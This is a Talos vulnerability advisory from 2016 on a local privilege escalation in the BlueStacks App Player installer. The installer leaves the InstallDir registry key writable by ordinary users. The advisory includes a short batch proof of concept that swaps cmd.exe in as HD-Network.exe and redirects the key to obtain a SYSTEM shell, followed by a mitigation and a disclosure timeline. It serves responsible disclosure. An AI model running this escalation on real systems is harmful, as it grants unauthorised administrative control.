Talos Vulnerability Report
BlueStacks App Player Privilege Escalation Vulnerability
August 4, 2016
A local privilege escalation vulnerability exists in BlueStacks App Player. The BlueStacks App Player installer creates a registry key with weak permissions that allows users to execute arbitrary programs with SYSTEM privileges.
During installation BlueStacks App Player creates registry keys with weak permissions. Here we can see the ‘Users’ group has full permissions on the InstallDir key:
accesschk -k -w -d HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks HKLM\SOFTWARE\BlueStacks RW BUILTIN\Users RW BUILTIN\Administrators RW NT\SYSTEM
Using process monitor we can observe that BlueStacks service is reading the InstallDir key to obtain installation path and later executes HD-Network.exe and other files from that path. A malicious user can set InstallDir to a directory under their control to execute arbitrary code with SYSTEM privileges.
@echo off echo [+]Run cmd as SYSTEM mkdir c:\TALOS REM Copy others necessary files copy c:\windows\system32\cmd.exe HD-Network.exe reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\ echo [+]Restore default values
Change the permission for key to group other than Administrator on Read/Execute.
Discovered by Marcin ëIcewallí Noga of Cisco Talos.
2016-03-01 - Discovery 2016—04-13 - Reported 2016-08-04 - Patched 2016-08-04 - Released